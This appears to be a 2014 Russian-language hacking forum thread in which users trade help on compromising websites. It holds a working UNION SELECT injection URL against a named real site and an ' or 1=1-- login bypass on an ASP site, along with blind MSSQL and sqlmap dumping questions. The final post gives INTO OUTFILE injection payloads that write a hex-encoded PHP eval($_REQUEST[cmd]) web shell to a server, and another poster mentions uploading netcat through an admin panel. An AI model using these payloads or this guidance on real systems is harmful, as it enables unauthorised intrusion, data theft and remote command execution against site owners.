 |
|

06.05.2014, 16:11
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от LelouchMe
Ребят, помогите - нашел уязвимость с 6 полями, но выводить их не хочет...
Слепая ли это и как раскрутить правильно...
http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,5,6--
спасибо...
title смотрите.
|
|
|

06.05.2014, 16:11
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от LelouchMe
Ребят, помогите - нашел уязвимость с 6 полями, но выводить их не хочет...
Слепая ли это и как раскрутить правильно...
http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,5,6--
спасибо...
http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,version(),6--
Все выводит.
|
|
|

08.05.2014, 18:48
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
С нами:
8827377
Репутация:
-5
|
|
Добрый день! Подскажите пожалуйста, по заливке шелла
Заливаю файл через phpmyadmin под пользователем root. File_priv=Y Grant_priv=Y
Знаю полный путь до сайта через phpinfo, и знаю точные папки доступные под запись.
В /tmp заливается без проблем файл и считывается тоже.
Подскажите почему отказывается заливать в нужную папку сайта, если права позволяют? Пробовал залить файл через админку сайта - всё норм заливается.
|
|
|

08.05.2014, 19:12
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от Evil_Genius
Подскажите почему отказывается заливать в нужную папку сайта, если права позволяют? Пробовал залить файл через админку сайта - всё норм заливается.
Вы уверены, что папки доступны на запись? INTO OUTFILE/DUMPFILE действуют из под юзера mysql, а сайт, вероятно, через www-root.
|
|
|

08.05.2014, 19:40
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
С нами:
8827377
Репутация:
-5
|
|
Сообщение от XAMEHA
Вы уверены, что папки доступны на запись? INTO OUTFILE/DUMPFILE действуют из под юзера mysql, а сайт, вероятно, через www-root.
Да действительно, сейчас залился через админку netcat. Права на сайт полные, но юзер какраз другой. Видимо из-за этого и не заливалось((
|
|
|

09.05.2014, 16:00
|
|
Познающий
Регистрация: 20.09.2012
Сообщений: 53
С нами:
7180886
Репутация:
0
|
|
Задача: нужно сдампить 3 колонки с помощью sqlmap
column1 - int
column2,3 - varchar
Но почему то дампится только одна колонка
По отдельности, все нормально. В чем может быть причина?
Синтаксически запрос составляю верно
|
|
|

12.05.2014, 19:07
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
Привет, прошу помощи:
Есть asp сайт, при помощи ' or 1=1-- в поле пассворд можно залогинится под юзером, я так полагаю под 1 юзером в бд, но это не админ.
Как-то можно раскрутить это?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]Microsoft VBScript runtime error[/COLOR][COLOR="#DD0000"]'800a000d'[/COLOR][COLOR="#0000BB"]Type mismatch[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]'Cint'[/COLOR][/COLOR]
вот еще, помогите пожалуйста, а то не знал, не знал да и забыл все в скулях
UPDATE
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]Microsoft OLE DB Provider[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]SQL Server error[/COLOR][COLOR="#DD0000"]'80040e14'[/COLOR][COLOR="#0000BB"]Unclosed quotation mark after the character string[/COLOR][COLOR="#DD0000"]'8''.[/COLOR][/COLOR]
при .asp?itemkey=12345678' проблема в том что стоит фильтир, если неравно 9 символом, то выскакивает еррор пейдж, есть ли возможность обойти?///
UPD
есть blind MSsql inj, подкиньте маны, а то гугл не помогает
//
karoche mana est'
теперь нужен софт для раскрутки blind MSSQL injection, или кто гуру - какие параметры кормить sqlmap?
иньекция в поле пассворд, логика
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]or {[/COLOR][COLOR="#0000BB"]MY STATEMENT HERE[/COLOR][COLOR="#007700"]}[/COLOR][/COLOR]
как-то так
ПС
походу надо писать софт, ибо если руками перебирать то можно в психушку попасть
АПДЕЙТ
Я еще не в психушке, хорошый мануал по ms sql _ttp://www.exploit-db.com/papers/12975/
|
|
|

18.05.2014, 15:04
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
Может ли быть xss в ответе аякса если не фильтруются ?
пробовал добавлять html / body head и т.п.
ничего не выходило
|
|
|

19.05.2014, 09:49
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от psihoz26
Может ли быть xss в ответе аякса если не фильтруются ?
пробовал добавлять html / body head и т.п.
ничего не выходило
Вероятно, сервер отдает Content-Type: text/*
Поведение разных версий браузеров может варьироваться.
|
|
|

19.05.2014, 21:52
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
С нами:
8397749
Репутация:
0
|
|
Условия:
1. File_priv: Y
2. Возможно читать файлы
3. Возможное раскрытие путей через Wordpress
4. Заливка файла через INTO OUTFILE - возможна.
Всё-бы нечего, НО:
Начнём историю по порядку - во-первых на самом сайте через wp-config запрещён доступ к theme-editor и plugin-editor всем пользователям.
Но я не отчаивался, т.к. File_priv: Y.
Всё вроде бы ничего и даже получил раскрытие путей, однако:
Сообщение от None
/home/httpd/html/site/shared/wp/live/
Уже это насторожило, т.к. сам блог находится по адресу site.com/blog/, но я не сдавался и шел по избранному мною пути:
1.
Сообщение от None
+union+select+1,2,3,0x273c203f706870206576616c2824 5f524551554553545b636d645d293b203f3e27,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20+from+mysql.user+in to+outfile+'/home/httpd/html/site/shared/wp/live/wp-content/vvvvv.php'--
Can't create/write to file '/home/httpd/html/site/shared/wp/live/wp-content/vvvvv.php' (Errcode: 2)
Супервозмущение
Но я не отчаивался и шёл!
Дошёл до
2.
Сообщение от None
+union+select+1,2,3,0x273c203f706870206576616c2824 5f524551554553545b636d645d293b203f3e27,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20+from+mysql.user+in to+outfile+'/home/httpd/html/'--
File '/home/httpd/html/' already exists
И вот, я кажется дошёл. Но тут подвох - я перепробовал все возможные комбинации и даже очень опасную, однако даже она дала сбой
Can't create/write to file '/home/httpd/html/huipizdamatreshka/' (Errcode: 21)
Если подставлять вместо опасного запроса, запрос вида: into+outfile+'/home/httpd/html/site/1.txt'-- , либо любой другой, то получаю ошибку Errcode: 2 , т.е. нет директории site.
Читал на форумах, что в случае, если адрес не известен, то читаем файл httpd.conf (прочитал его по /etc/httpd/conf/httpd.conf ).
Нашёл в нём: DocumentRoot "/var/www/html" и всё равно провалился. Чтобы не делал - результат один Errcode 2, 13, 21
Есть ли у кого-нибудь, какие-нибудь предположение или догадки, как найти полный путь до папки? Кстати, нет-нет, но закачал файл в /tmp/ . Результат
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|